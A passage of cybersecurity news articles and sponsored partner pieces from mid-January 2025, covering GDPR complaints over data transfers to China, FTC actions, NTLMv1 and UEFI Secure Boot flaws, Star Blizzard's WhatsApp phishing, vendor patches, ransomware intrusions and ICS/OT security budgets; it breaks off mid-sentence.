Jan 17, 2025Ravie LakshmananPrivacy / Data ProtectionAustrian privacy non-profit None of Your Business (noyb) has filed complaints accusing companies like TikTok, AliExpress, SHEIN, Temu, WeChat, and Xiaomi of violating data protection regulations in the European Union by unlawfully transferring users' data to China.The advocacy group is seeking an immediate suspension of such transfers, stating the companies in question cannot shield user data from being potentially accessed by the Chinese government. The complaints have been filed in Austria, Belgium, Greece, Italy, and the Netherlands."Given that China is an authoritarian surveillance state, it is crystal clear that China doesn't offer the same level of data protection as the E.U.," Kleanthi Sardeli, data protection lawyer at noyb, said. "Transferring Europeans' personal data is clearly unlawful and must be terminated immediately."Noyb noted that the companies have no choice but to comply with Chinese authorities' requests for access to data, and that Beijing lacks an independent data protection authority to raise issues related to government surveillance.It also said none of the companies responded to its access requests under the General Data Protection Regulation (GDPR) to seek clarity on the nature of data transfers, and if they are transmitted to China or any other country outside of the E.U."According to their privacy policy, AliExpress, SHEIN, TikTok, and Xiaomi transfer data to China," noyb said. "Temu and WeChat mention transfers to third countries. According to Temu and WeChat's corporate structure, this most likely includes China."The development comes as ByteDance-owned TikTok is preparing to shut down its app in the U.S. starting January 19, 2025, when a federal ban on the social media platform is scheduled to come into effect. In recent months, noyb has filed GDPR-related complaints against Google, Microsoft, and Mozilla for tracking users without consent through Privacy Sandbox, Xandr, and Firefox, respectively.FTC Takes Actions Against General Motors and GoDaddyThe complaints also coincide with the U.S. Federal Trade Commission (FTC) banning automaker General Motors from disclosing data that it collects from drivers, including geolocations and driver behavior information, to consumer reporting agencies for five years for sharing such data without their affirmative consent.According to a New York Times investigation in March 2024, the information was shared with two data brokers, LexisNexis Risk Solutions and Verisk, that worked with the insurance industry to generate risk profiles and increase auto insurance rates for some drivers. In a statement, General Motors said it had already discontinued the "Smart Driver" data collection program in April 2024 "due to customer feedback." The company said customers could access and delete their personal information through a U.S. Consumer Privacy Request Form on its website.The FTC has also ordered website hosting provider GoDaddy to implement a comprehensive information security program to overhaul its "unreasonable security practices" that led to multiple customer data breaches between 2019 and 2022. GoDaddy has not admitted to any wrongdoing, nor has it been fined."GoDaddy has failed to implement reasonable and appropriate security measures to protect and monitor its website-hosting environments for security threats, and misled customers about the extent of its data security protections on its website hosting services," the FTC said.The agency pointed out that GoDaddy failed to properly manage its assets and inventory; patch its software; assess risks to its hosting services; use multi-factor authentication; log security-related events; monitor for security threats; segment its network; and secure connections to services providing access to consumer data.The consumer protection agency has since also announced amendments to online privacy safeguards for children under the Children's Online Privacy Protection Rule (COPPA) that require obtaining verifiable parental consent prior to processing their data for advertising purposes or sharing it with third-parties.Furthermore, the rule imposes new data retention policies, necessitating that companies only retain children's information "for as long as reasonably necessary to fulfill a specific purpose for which it was collected." "By requiring parents to opt in to targeted advertising practices, this final rule prohibits platforms and service providers from sharing and monetizing children's data without active permission," FTC Chair Lina M. Khan said.Found this article interesting? Follow us on Twitter and LinkedIn to read more exclusive content we post.SHARE

Jan 16, 2025Ravie LakshmananActive Directory / VulnerabilityCybersecurity researchers have found that the Microsoft Active Directory Group Policy that's designed to disable NT LAN Manager (NTLM) v1 can be trivially bypassed by a misconfiguration."A simple misconfiguration in on-premise applications can override the Group Policy, effectively negating the Group Policy designed to stop NTLMv1 authentications," Silverfort researcher Dor Segal said in a report shared with The Hacker News.NTLM is a still widely used mechanism particularly in Windows environments to authenticate users across a network. The legacy protocol, while not removed due to backward compatibility requirements, has been deprecated as of mid 2024.Late last year, Microsoft officially removed NTLMv1 starting in Windows 11, version 24H2, and Windows Server 2025. While NTLMv2 introduces new mitigations to make it harder to perform relay attacks, the technology has been besieged by several security weaknesses that have been actively exploited by threat actors to access sensitive data.In exploiting these flaws, the idea is to coerce a victim to authenticate to an arbitrary endpoint, or relay the authentication information against a susceptible target and perform malicious actions on behalf of the victim."The Group Policy mechanism is Microsoft's solution to disable NTLMv1 across the network," Segal explained. "The LMCompatibilityLevel registry key prevents the Domain Controllers from evaluating NTLMv1 messages and returns a wrong password error (0xC000006A) when authenticating with NTLMv1."However, Silverfort's investigation found that it's possible to circumvent the Group Policy and still use NTLMv1 authentication by taking advantage of a setting in the Netlogon Remote Protocol (MS-NRPC).Specifically, it leverages a data structure called NETLOGON_LOGON_IDENTITY_INFO, which contains a field named ParameterControl that, in turn, has a configuration to "Allow NTLMv1 authentication (MS-NLMP) when only NTLMv2 (NTLM) is allowed.""This research shows on-prem applications can be configured to enable NTLMv1, negating the Highest Level of the Group Policy LAN Manager authentication level set in Active Directory," Segal said."Meaning, organizations think they are doing the right thing by setting this group policy, but it's still being bypassed by the misconfigured application."To mitigate the risk posed by NTLMv1, it's essential to enable audit logs for all NTLM authentication in the domain and keep an eye out for vulnerable applications that request clients to use NTLMv1 messages. It also goes without saying that organizations are recommended to keep their systems up-to-date.The disclosure comes as HN Security researcher Alessandro Iandoli detailed how various security features in Windows 11 (prior to version 24H2) could be bypassed to achieve arbitrary code execution at the kernel level.Found this article interesting? Follow us on Twitter and LinkedIn to read more exclusive content we post.SHARE

Jan 16, 2025Ravie LakshmananSpear Phishing / Threat IntelligenceThe Russian threat actor known as Star Blizzard has been linked to a new spear-phishing campaign that targets victims' WhatsApp accounts, signaling a departure from its longstanding tradecraft in a likely attempt to evade detection."Star Blizzard's targets are most commonly related to government or diplomacy (both incumbent and former position holders), defense policy or international relations researchers whose work touches on Russia, and sources of assistance to Ukraine related to the war with Russia," the Microsoft Threat Intelligence team said in a report shared with The Hacker News.Star Blizzard (formerly SEABORGIUM) is a Russia-linked threat activity cluster known for its credential harvesting campaigns. Active since at least 2012, it's also tracked under the monikers Blue Callisto, BlueCharlie (or TAG-53), Calisto (alternately spelled Callisto), COLDRIVER, Dancing Salome, Gossamer Bear, Iron Frontier, TA446, and UNC4057.Previously observed attack chains have involved sending spear-phishing emails to targets of interest, usually from a Proton account, attaching documents embedding malicious links that redirect to an Evilginx-powered page that's capable of harvesting credentials and two-factor authentication (2FA) codes via an adversary-in-the-middle (AiTM) attack.Star Blizzard has also been linked to the use of email marketing platforms like HubSpot and MailerLite to conceal the true email sender addresses and obviate the need for including actor-controlled domain infrastructure in email messages.Late last year, Microsoft and the U.S. Department of Justice (DoJ) announced the seizure of more than 180 domains that were used by the threat actor to target journalists, think tanks, and non-governmental organizations (NGOs) between January 2023 and August 2024.The tech giant assessed public disclosure into its activities may have likely prompted the hacking crew to switch up its tactics by compromising WhatsApp accounts. That said, the campaign appears to have been limited and wound down at the end of November 2024."The targets primarily belong to the government and diplomacy sectors, including both current and former officials," Sherrod DeGrippo, director of threat intelligence strategy at Microsoft, told The Hacker News."Additionally, the targets encompass individuals involved in defense policy, researchers in international relations focusing on Russia, and those providing assistance to Ukraine in relation to the war with Russia."It all starts with a spear-phishing email that purports to be from a U.S. government official to lend it a veneer of legitimacy and increase the likelihood that the victim would engage with them.The message contains a quick response (QR) code that urges the recipients to join a supposed WhatsApp group on "the latest non-governmental initiatives aimed at supporting Ukraine NGOs." The code, however, is deliberately broken so as to trigger a response from the victim.Should the email recipient reply, Star Blizzard sends a second message, asking them to click on a t[.]ly shortened link to join the WhatsApp group, while apologizing for the inconvenience caused."When this link is followed, the target is redirected to a web page asking them to scan a QR code to join the group," Microsoft explained. "However, this QR code is actually used by WhatsApp to connect an account to a linked device and/or the WhatsApp Web portal."In the event the target follows the instructions on the site ("aerofluidthermo[.]org"), the approach allows the threat actor to gain unauthorized access to their WhatsApp messages and even exfiltrate the data via browser add-ons.Individuals who belonging to sectors targeted by Star Blizzard are advised to exercise caution when it comes to handling emails containing links to external sources.The campaign "marks a break in long-standing Star Blizzard TTPs and highlights the threat actor's tenacity in continuing spear-phishing campaigns to gain access to sensitive information even in the face of repeated degradations of its operations."Found this article interesting? Follow us on Twitter and LinkedIn to read more exclusive content we post.SHARE

Jan 16, 2025Ravie LakshmananVulnerability / CybersecurityDetails have emerged about a now-patched security vulnerability that could allow a bypass of the Secure Boot mechanism in Unified Extensible Firmware Interface (UEFI) systems.The vulnerability, assigned the CVE identifier CVE-2024-7344 (CVSS score: 6.7), resides in a UEFI application signed by Microsoft's "Microsoft Corporation UEFI CA 2011" third-party UEFI certificate, according to a new report from ESET shared with The Hacker News.Successful exploitation of the flaw can lead to the execution of untrusted code during system boot, thereby enabling attackers to deploy malicious UEFI bootkits on machines that have Secure Boot on, irrespective of the operating system installed.Secure Boot is a firmware security standard that prevents malware from loading when a computer starts up by ensuring that the device boots using only software that is trusted by the Original Equipment Manufacturer (OEM). The feature leverages digital signatures to validate the authenticity, source, and integrity of the code that is loaded.The affected UEFI application is part of several real-time system recovery software suites developed by Howyar Technologies Inc., Greenware Technologies, Radix Technologies Ltd., SANFONG Inc., Wasay Software Technology Inc., Computer Education System Inc., and Signal Computer GmbH -Howyar SysReturn before version 10.2.023_20240919Greenware GreenGuard before version 10.2.023-20240927Radix SmartRecovery before version 11.2.023-20240927Sanfong EZ-back System before version 10.3.024-20241127WASAY eRecoveryRX before version 8.4.022-20241127CES NeoImpact before version 10.1.024-20241127SignalComputer HDD King before version 10.3.021-20241127"The vulnerability is caused by the use of a custom PE loader instead of using the standard and secure UEFI functions LoadImage and StartImage," ESET researcher Martin Smolr said. "As a result, the application allows the loading of any UEFI binary even an unsigned one from a specially crafted file named cloak.dat, during system start, regardless of the UEFI Secure Boot state."An attacker who weaponizes CVE-2024-7344 could, therefore, sidestep UEFI Secure Boot protections and execute unsigned code during the boot process in the UEFI context even before the operating system loads, granting them covert, persistent access to the host."Code executed in this early boot phase can persist on the system, potentially loading malicious kernel extensions that survive both reboots and OS reinstallation," the CERT Coordination Center (CERT/CC) said. "Additionally, it may evade detection by OS-based and endpoint detection and response (EDR) security measures."Malicious actors could further expand the scope of exploitation by bringing their own copy of the vulnerable "reloader.efi" binary to any UEFI system with the Microsoft third-party UEFI certificate enrolled. However, elevated privileges are required to deploy the vulnerable and malicious files to the EFI system partition: local administrator on Windows and root on Linux.The Slovakian cybersecurity firm said it responsibly disclosed the findings to the CERT/CC in June 2024, following which Howyar Technologies and their partners addressed the issue in the concerned products. On January 14, 2025, Microsoft revoked the old, vulnerable binaries as part of its Patch Tuesday update.Outside of applying UEFI revocations, managing access to files located on the EFI system partition, Secure Boot customization, and remote attestation with a Trusted Platform Module (TPM) are some of the other ways of protecting against exploitation of unknown vulnerable signed UEFI bootloaders and deployment of UEFI bootkits."The number of UEFI vulnerabilities discovered in recent years and the failures in patching them or revoking vulnerable binaries within a reasonable time window shows that even such an essential feature as UEFI Secure Boot should not be considered an impenetrable barrier," Smolr said."However, what concerns us the most with respect to the vulnerability is not the time it took to fix and revoke the binary, which was quite good compared to similar cases, but the fact that this isn't the first time that such an obviously unsafe signed UEFI binary has been discovered. This raises questions of how common the use of such unsafe techniques is among third-party UEFI software vendors, and how many other similar obscure, but signed, bootloaders there might be out there."Found this article interesting? Follow us on Twitter and LinkedIn to read more exclusive content we post.SHARE

Jan 16, 2025The Hacker NewsIdentity Protection / SaaS SecurityYou can tell the story of the current state of stolen credential-based attacks in three numbers:Stolen credentials were the #1 attacker action in 2023/24, and the breach vector for 80% of web app attacks. (Source: Verizon).Cybersecurity budgets grew again in 2024, with organizations now spending almost $1,100 per user (Source: Forrester). Stolen credentials on criminal forums cost as little as $10 (Source: Verizon).Something doesn't add up. So, what's going on?In this article, we'll cover:What's contributing to the huge rise in account compromises linked to stolen creds and why existing approaches aren't working. The world of murky intelligence on stolen credentials, and how to cut through the noise to find the true positives.Recommendations for security teams to stop attackers from using stolen creds to achieve account takeover.Stolen credential-based attacks are on the riseThere's clear evidence that identity attacks are now the #1 cyber threat facing organizations. The attacks on Snowflake customers in 2024 collectively constituted the biggest cyber security event of the year in terms of the number of organizations and individuals affected (at least, if you exclude CrowdStrike causing a worldwide outage in July) certainly, it was the largest perpetrated by a criminal group against commercial enterprises. It has been touted by some news outlets as "one of the biggest breaches ever."Around 165 organizations using Snowflake (a cloud-based data warehousing and analytics platform) were targeted using stolen credentials harvested from infostealer infections dating as far back as 2020. These affected accounts also lacked MFA, enabling attackers to log in with a single compromised factor.The impact was massive. In all, 9 victims have been named publicly following the breach, impacting hundreds of millions of people's sensitive data. At least one victim paid an undisclosed ransom fee. But this wasn't a one-off. These attacks were happening constantly throughout 2024. The huge Change Healthcare breach, which culminated in 100 million customers being impacted and a $22 million ransom demand, started with stolen Citrix credentials. Disney's Confluence servers and Slack instance were hacked, resulting in huge amounts of commercially sensitive data and IT infrastructure details being leaked, as well as messages from 10,000 Slack channels. Microsoft suffered a significant breach of their Office 365 environment, with sensitive emails leaked after a "test" OAuth application was compromised using stolen creds. Finastra, Schneider Electric, Nidec, Foundation, ADT, HealthEquity, Park'N Fly, Roku, LA County Health Services, and many more all suffered data breaches of varying severity as a result of stolen creds. Researchers are getting in on the action too. In October, Microsoft's ServiceNow tenant was hacked using stolen credentials acquired online, accessing thousands of support ticket descriptions and attachments, and 250k+ employee emails.Stolen credentials are still a problem? Really? Key to many of the attacks targeting workforce identities and online accounts is the use of stolen credentials. And unfortunately, an increased focus on MFA adoption hasn't quite solved the problem. MFA gaps remain rife. Research from Push Security shows that where a password is the sole login method for an account, these accounts lack MFA in 4 out of 5 cases. The number of breached credentials continues to grow at an alarming rate due to the prevalence of infostealer compromises. And data breaches tend to beget more data breaches as account information is leaked, creating a vicious cycle. The shift to third-party apps and services for most major business operations, leading to more accounts, more credentials, and more valuable business data in the cloud all low-hanging targets for attackers. So, there are more targets for attackers, more credentials to use against them, and MFA (in particular phishing-resistant MFA) is nowhere near as present as we'd hope. Look at the breaches we mentioned earlier many of the victims are huge companies, with vast security budgets. If they can't achieve complete coverage, then how can anyone be expected to? The rise of infostealersThe rise of infostealer malware has had a significant impact on the increase in credential-based attacks. While infostealer malware isn't exactly new, it's a growing concern for many security organizations. Commercial Malware-as-a-Service offerings on the criminal underground are being continuously updated to evade detection controls, and the more sophisticated criminal and nation state-backed threat groups are proficient in creating custom malware. It's a cat-and-mouse game, and the sheer number of compromised credentials tracing back to infostealer infections is a testament to their success. Once stolen, credential data such as usernames, passwords, and session cookies makes its way to criminal forums on both the clearweb and the darkweb. Popular infostealers even have their own dedicated Telegram channels to advertise and sell stolen data. But the landscape in which they are deployed has evolved too. There's a greater appetite for stolen credentials among cyber criminals, and ultimately the more apps that companies use (typically 200+ for the average organization), the more accounts they have connected to them, and the more credentials there are to steal. And because infostealers target all credentials saved on the victim's device (not just those belonging to a single app/website as per phishing campaigns) they're perfectly poised to smash and grab. Modern working arrangements open up the attack surface further. All it takes is for a user to log into their personal browser profile on a corporate device (or the inverse), and their personal device to be compromised, for corporate credentials to be stolen. And because infostealers are pushed through unorthodox channels compared to more traditional email-based attacks (like gaming forums, Facebook ads, and YouTube video descriptions) it's no surprise that unsuspecting victims are falling foul. And with password reuse incredibly common (10% of accounts have a breached, weak, or reused password and no MFA), stolen credentials from personal accounts can often be used to access corporate apps too. All it takes is an attacker with a little patience or the skill to automate SaaS credential stuffing at scale. The modern identity attack landscape has changed (a lot)In the past, security and IT teams were masters of their own Active Directory universe, making it possible to participate in password-cracking exercises or to compare threat intel lists to passwords in use by employees.That picture has changed. Security teams now face a tangle of managed and unmanaged SaaS as critical business operations have moved online. They lack visibility into identity posture on these apps, and the vast majority of organizations do not even have a plausible method for identifying all their accounts and apps in use across the business.SaaS attack paths leave little room for errorIdentity attacks are now fundamentally different. Unlike traditional network-based attacks, attacks that target online accounts follow a much more direct attack path. Traditional attacks progress by network access, lateral movement, privilege escalation, and other familiar activities. These kinds of attacks are well understood by security teams and existing tooling can observe and detect these techniques.But account takeover requires an attacker only to compromise an account (the point of initial access) from where they can collect and exfiltrate data from the compromised app. The attack can be over very quickly, and traditional tooling offers little to prevent malicious activity in-app. Given the weak state of SaaS logging, it's likely that most app compromises won't even be visible to the security team. Even if data is available, detection and response becomes much more difficult after account takeover. There is limited log data available from SaaS to begin with, and distinguishing legitimate user activity from malicious activity is difficult. We saw with the Snowflake breaches that attackers simply logged in to user accounts using stolen credentials and then used a utility to perform account takeover and recon at scale, ending by using SQL commands to stage and exfiltrate data across multiple Snowflake customer tenants.Response activities are also constrained by circumstances: Do you have admin rights to the app? Does the app provide the kinds of response activities, such as forcing a session logout, that you need to perform? Each incident can feel like a one-off investigation, with peculiarities in each app to identify and work through, and few opportunities to automate security responses limiting response teams to postmortem activities, who find themselves unable to contain or reduce the scope of the breach. What about threat intelligence? Threat intelligence on stolen credentials is plentiful many commercially available feeds can be acquired and ingested by security teams. However, the challenge is finding out where these creds are actually being used, and separating out the false positives. Researchers at Push Security recently evaluated threat intelligence data representing 5,763 username and password combinations that matched domains in use by Push customers. They found that fewer than 1% of the credentials in the multi-vendor dataset were true positives meaning that the suspected stolen credentials were still in use by employees at those organizations. In other words, 99.5% of the stolen credentials they checked were false positives at the time of review.To deliver on the promise of threat intelligence in a meaningful way, security teams need a different approach. For a start, they need to be able to securely observe and match the passwords found in credential feeds with those being used. Most organizations fail to extract much value from compromised credential feeds. At most, you might be automating the process of requesting that users check their credentials for their primary SSO login (e.g. Okta, Entra, Google Workspace) when a credential breach notification comes through. But this workflow won't scale when you consider how often these breached credential lists are recycled it all starts to get a bit spammy. After a while, users will start to complain and ignore these requests.How security teams can prevent account takeover from stolen credentials using browser telemetrySecurity teams need a modern approach to defending against account takeover by preventing stolen credentials from being used, and MFA gaps being exploited.Push Security provides a browser-based ITDR platform that deploys a browser agent to employee browsers in order to stop identity attacks. Push uses a browser agent that is able to securely observe credentials at the time of login to any app, in addition to collecting rich browser telemetry and providing security controls designed to stop account takeovers before they occur.Push is also able to supply browser telemetry and an inventory of your entire identity attack surface of accounts and apps, as well as analyze the security posture of employee passwords, login methods, and MFA status to close off high-risk account vulnerabilities.Push recently released two capabilities geared toward helping security teams stop account takeovers caused by stolen credentials and MFA gaps.Correlate the credentials your employees use with those found in compromised credential feedsThe Push browser agent is able to compare suspected stolen credentials supplied by TI feeds to creds actually in use by employees across your organization and then flag only the verified true positives.Push customers can consume TI from the sources supplied directly by the Push platform or use the Push REST API to submit their own email/password combos from existing TI tools.This method works regardless of the source of the data or its age. This method also uncovers where a stolen credential on one app is also in use on several other apps. Here's how it works:Push receives TI on stolen credentials from vendor feeds.For each customer environment, Push checks for customer domains in the data set.When suspected stolen creds for a customer environment are present, Push hashes and salts the passwords and then sends those fingerprints to the relevant browser agents for comparison. For customer-supplied credential data, Push performs the same salting and hashing to create fingerprints it can use to compare to password fingerprints observed by the relevant browser agents.If the stolen credential fingerprint matches a known credential fingerprint observed to be in use by the Push browser agent, the platform returns a validated true positive alert.You can receive alerts for this detection via webhook, messaging platform notification, or in the Push admin console.Check out the feature release video for more information below:Get MFA visibility across all your apps and close the gapsPush can also help teams close MFA gaps. As users access apps with their corporate identities, Push analyzes their MFA registration status and methods, and also identifies which apps they're using and their login methods. Using in-browser controls, Push can guide users to register MFA across different apps. Imagine a scenario where you need to quickly investigate the business impact of a recently announced SaaS breach. Using Push, you can:Immediately check whether the Push extension has observed employee usage of the breached app. You can also see how many accounts Push has seen on that app and how they are accessing it (SSO vs. other methods, such as local password login).For those accounts on the breached app, you can quickly see whether they have MFA, and which methods are registered. To determine MFA status, the Push extension uses the existing user's active session on an app to query that account's MFA registration status using the app's own API, providing a trustworthy verification. You can also see whether the users' passwords have any security issues, such as a verified stolen credential, or a password that's weak or reused.For accounts that lack MFA, you can then configure an enforcement control to prompt employees who lack MFA to set it up whenever they next use the app. Then, use Push's webhooks to monitor for MFA registrations and password changes by querying browser telemetry supplied by the Push agent.You can learn more about this feature here.By combining alerting for verified stolen credentials with the ability to find and increase MFA adoption even on unmanaged apps, Push offers security teams a formidable toolkit for stopping account takeover.Find out moreIf you want to learn more about identity attacks and how to stop them, check out Push Security you can try out their browser-based agent for free.Found this article interesting? This article is a contributed piece from one of our valued partners. Follow us on Twitter and LinkedIn to read more exclusive content we post.SHARE

Jan 16, 2025The Hacker NewsCertificate Management / ComplianceThe digital world is exploding. IoT devices are multiplying like rabbits, certificates are piling up faster than you can count, and compliance requirements are tightening by the day. Keeping up with it all can feel like trying to juggle chainsaws while riding a unicycle.Traditional trust management? Forget it. It's simply not built for today's fast-paced, hybrid environments. You need a solution that can handle the chaos, not add to it.Introducing DigiCert ONE: a revolutionary platform designed to simplify and automate your entire trust ecosystem.But seeing is believing, right? That's why we're hosting a free webinar to show you DigiCert ONE in action.In this can't-miss event, you'll discover how to:Centralized Control, Simplified Operations: Tired of juggling certificate chaos? Discover how DigiCert ONE makes it easy to manage certificates for devices, users, and workloadsall in one place.Automate and Secure Your Hybrid Environment: Complexity grows as your systems expand, but DigiCert ONE automates trust operations to keep everything running smoothly while reducing risk.DevOps Meets Security: Don't let DevOps speed compromise security. Learn how to implement secure, automated software signing practices that integrate seamlessly into your workflows.Stress-Free Compliance: Keep auditors happy with advanced reporting tools that ensure you meet even the toughest compliance requirements without breaking a sweat.Whether you're dealing with IoT security, enterprise IT, or fast-paced DevOps workflows, trust is at the heart of your digital operations. But managing trust doesn't have to be the headache it is today.The DigiCert ONE Webinar will show you how to take back controlscaling security with confidence while cutting down on complexity. Register for this now.Don't let outdated processes hold you back. This is your opportunity to gain clarity, learn from industry experts, and see how DigiCert ONE delivers trust like never before.Found this article interesting? This article is a contributed piece from one of our valued partners. Follow us on Twitter and LinkedIn to read more exclusive content we post.SHARE

Jan 16, 2025Ravie LakshmananVulnerability / Endpoint SecurityIvanti has rolled out security updates to address several security flaws impacting Avalanche, Application Control Engine, and Endpoint Manager (EPM), including four critical bugs that could lead to information disclosure.All the four critical security flaws, rated 9.8 out of 10.0 on the CVSS scale, are rooted in EPM, and concern absolute path traversal flaws that allow a remote unauthenticated attacker to leak sensitive information. The flaws are listed below -CVE-2024-10811CVE-2024-13161 CVE-2024-13160, andCVE-2024-13159The shortcomings affect EPM versions 2024 November security update and prior, and 2022 SU6 November security update and prior. They have been addressed in EPM 2024 January-2025 Security Update and EPM 2022 SU6 January-2025 Security Update.Horizon3.ai security researcher Zach Hanley has been credited with discovering and reporting all vulnerabilities in question.Also patched by Ivanti are multiple high-severity bugs in Avalanche versions prior to 6.4.7 and Application Control Engine before version 10.14.4.0 that could permit an attacker to bypass authentication, leak sensitive information, and get around the application blocking functionality.The company said it has no evidence that any of the flaws are being exploited in the wild, and that it has intensified its internal scanning and testing procedures to promptly flag and address security issues.The development comes as SAP released fixes to resolve two critical vulnerabilities in its NetWeaver ABAP Server and ABAP Platform (CVE-2025-0070 and CVE-2025-0066, CVSS scores: 9.9) that allows an authenticated attacker to exploit improper authentication checks in order to escalate privileges and access restricted information due to weak access controls."SAP strongly recommends that the customer visits the Support Portal and applies patches on priority to protect their SAP landscape," the company said in its January 2025 bulletin.Found this article interesting? Follow us on Twitter and LinkedIn to read more exclusive content we post.SHARE

Jan 16, 2025Ravie LakshmananEndpoint Security / RansomwareCybersecurity researchers have detailed an attack that involved a threat actor utilizing a Python-based backdoor to maintain persistent access to compromised endpoints and then leveraged this access to deploy the RansomHub ransomware throughout the target network.According to GuidePoint Security, initial access is said to have been facilitated by means of a JavaScript malware downloaded named SocGholish (aka FakeUpdates), which is known to be distributed via drive-by campaigns that trick unsuspecting users into downloading bogus web browser updates.Such attacks commonly involve the use of legitimate-but-infected websites that victims are redirected to from search engine results using black hat Search Engine Optimization (SEO) techniques. Upon execution, SocGholish establishes contact with an attacker-controlled server to retrieve secondary payloads.As recently as last year, SocGholish campaigns have targeted WordPress sites relying on outdated versions of popular SEO plugins such as Yoast (CVE-2024-4984, CVSS score: 6.4) and Rank Math PRO (CVE-2024-3665, CVSS score: 6.4) for initial access.In the incident investigated by GuidePoint Security, the Python backdoor was found to be dropped about 20 minutes after the initial infection via SocGholish. The threat actor then proceeded to deliver the backdoor to other machines located in the same network during lateral movement via RDP sessions."Functionally, the script is a reverse proxy that connects to a hard-coded IP address. Once the script has passed the initial command-and-control (C2) handshake, it establishes a tunnel that is heavily based on the SOCKS5 protocol," security researcher Andrew Nelson said."This tunnel allows the threat actor to move laterally in the compromised network using the victim system as a proxy."The Python script, an earlier version of which was documented by ReliaQuest in February 2024, has been detected in the wild since early December 2023, while undergoing "surface-level changes" that are aimed at improving the obfuscation methods used to to avoid detection.GuidePoint also noted that the decoded script is both polished and well-written, indicating that the malware author is either meticulous about maintaining a highly readable and testable Python code or is relying on artificial intelligence (AI) tools to assist with the coding task."With the exception of local variable obfuscation, the code is broken down into distinct classes with highly descriptive method names and variables," Nelson added. "Each method also has a high degree of error handling and verbose debug messages."The Python-based backdoor is far from the only precursor detected in ransomware attacks. As highlighted by Halcyon earlier this month, some of the other tools deployed prior to ransomware deployment include those responsible for -Disabling Endpoint Detection and Response (EDR) solutions using EDRSilencer and BackstabStealing credentials using LaZagneCompromising email accounts by brute-forcing credentials using MailBruterMaintaining stealthy access and delivering additional payloads using Sirefef and MediyesRansomware campaigns have also been observed targeting Amazon S3 buckets by leveraging Amazon Web Services' Server-Side Encryption with Customer Provided Keys (SSE-C) to encrypt victim data. The activity has been attributed to a threat actor dubbed Codefinger.Besides preventing recovery without their generated key, the attacks employ urgent ransom tactics wherein the files are marked for deletion within seven days via the S3 Object Lifecycle Management API to pressurize victims into paying up."Threat actor Codefinger abuses publicly disclosed AWS keys with permissions to write and read S3 objects," Halcyon said. "By utilizing AWS native services, they achieve encryption in a way that is both secure and unrecoverable without their cooperation."The development comes as SlashNext said it has witnessed a surge in "rapid-fire" phishing campaigns mimicking the Black Basta ransomware crew's email bombing technique to flood victims' inboxes with over 1,100 legitimate messages related to newsletters or payment notices."Then, when people feel overwhelmed, the attackers swoop in via phone calls or Microsoft Teams messages, posing as company tech support with a simple fix," the company said."They speak with confidence to gain trust, directing users to install remote-access software like TeamViewer or AnyDesk. Once that software is on a device, attackers slip in quietly. From there, they can spread harmful programs or sneak into other areas of the network, clearing a path straight to sensitive data."Found this article interesting? Follow us on Twitter and LinkedIn to read more exclusive content we post.SHARE

Jan 15, 2025The Hacker NewsICS Security / Threat DetectionWhy does ICS/OT need specific controls and its own cybersecurity budget today? Because treating ICS/OT security with an IT security playbook isn't just ineffectiveit's high risk.In the rapidly evolving domain of cybersecurity, the specific challenges and needs for Industrial Control Systems (ICS) and Operational Technology (OT) security distinctly stand out from traditional IT security. ICS/OT engineering systems, which power critical infrastructure such as electric power grids, oil and gas processing, heavy manufacturing, food and beverage processes, and water management facilities, require tailored cybersecurity strategies, and controls. This is due to the increasing attacks towards ICS/OT, their unique operational missions, a different risk surface than that of traditional IT networks, and the significant safety consequences from cyber incidents that impact the physical world.Critical infrastructure should be protected against today's threats to continue supporting national safety and economic stability. ICS/OT-specific controls and a dedicated cybersecurity strategy is an effective and responsible approach.The Rising Cyber Threats to ICS/OT EnvironmentsICS technologies, crucial to modern infrastructure, are increasingly targeted in sophisticated cyber-attacks. These attacks, often aimed at causing irreversible physical damage to critical engineering assets, highlight the risks of interconnected and digitized systems. Recent incidents like TRISIS, CRASHOVERRIDE, Pipedream, and Fuxnet demonstrate the evolution of cyber threats from mere nuisances to potentially catastrophic events, orchestrated by state-sponsored groups and cybercriminals. These actors target not just financial gains but also disruptive outcomes and acts of warfare, blending cyber and physical attacks. Additionally, human-operated Ransomware and targeted ICS/OT ransomware pose concerns being on the rise in recent times. When it comes to leveraging ICS/OT specific controls to detect threats to our critical infrastructure, recent data from the 2024 SANS ICS/OT Cybersecurity Survey revealed that only 31% of respondents have a SOC (Security Operations Center) that includes capabilities specific to ICS/OT, which is crucial for effective incident response and ongoing system monitoring.As such, critical infrastructure, the engineering systems we rely on that make, move, and power our world, would do well to leverage ICS/OT specific threat detection and visibility, controls with an ICS specific budget to protect the engineering systems that operate our modern way of life.Evaluating ICS/OT Cybersecurity Spending and RiskThere may be a risky imbalance in security budget allocation in some ICS/OT organizations. It's understood, and rightfully so, that for the last few decades, security funding was almost solely dedicated to IT technology and IT networks due to traditional attacks using traditional vectors on traditional support systems. However, the threat landscape has changed due to interconnectivity. Now, IT networks and the Internet introduce significantly higher risks to connected ICS/OT environments than the risks ICS/OT and engineering environments had a few decades ago.In fact, data from the 2024 SANS State of ICS/OT Cybersecurity Report indicate that 46% of attacks on ICS/OT environments are sourced from a compromise in IT support networks that allow threats into ICS/OT, impacting networks and operations. This is concerning given the complex nature of ICS threats and the severe multi-sector cascading impacts that may result from a coordinated engineering cyber-attack in a vital critical infrastructure sector, such as the electric sector. Furthermore, attacks on ICS/OT can have serious consequences to the environment, and to the safety of people.Evaluating ICS/OT Cybersecurity ControlsThere may be a risky deployment of security controls in ICS/OT, if they are IT-centric. Despite their critical role, many ICS/OT systems remain under-protected in several areas, such as security controls dedicated to ICS/OT environments and incident response. For example, research from the 2023 SANS ICS/OT Cybersecurity Report revealed that only 52%of these facilities have a dedicated regularly exercised ICS/OT incident response plan that is engineering-driven.Traditional IT security measures, when applied to ICS/OT environments, can provide a false sense of security and disrupt engineering operations and safety. Thus, it is important to consider and prioritize the SANS Five ICS Cybersecurity Critical Controls. This freely available whitepaper sets forth the five most relevant critical controls for an ICS/OT cybersecurity strategy that can flex to an organization's risk model and provides guidance for implementing them.It is also important to note that using just one of the Five ICS Cybersecurity Critical Controls ICS Network Visibility Monitoring as an example - has benefits far more than just security-related. For example, mature organizations cite the main benefits of this control in the following areas as directly contributing to safety and engineering across: Safe, passive industrial traffic analysis to identify engineering assets to build an ICS/OT asset inventoryEngineering troubleshooting capabilitiesSafe, passive industrial traffic analysis to identify engineering system vulnerabilitiesIndustrial and engineering-driven specific incident response capabilitiesMeeting compliance requirementsStrategic Realignment OpportunitiesIt is worth reevaluating ICS/OT risks, impacts, budgets, and controls to protect what makes an ICS organization a business the engineering and operating technology systems. ICS/OT environments in many cases are not suited to leverage traditional IT security controls, where traditional IT security controls cause more problems than good.By aligning security expenditures with the 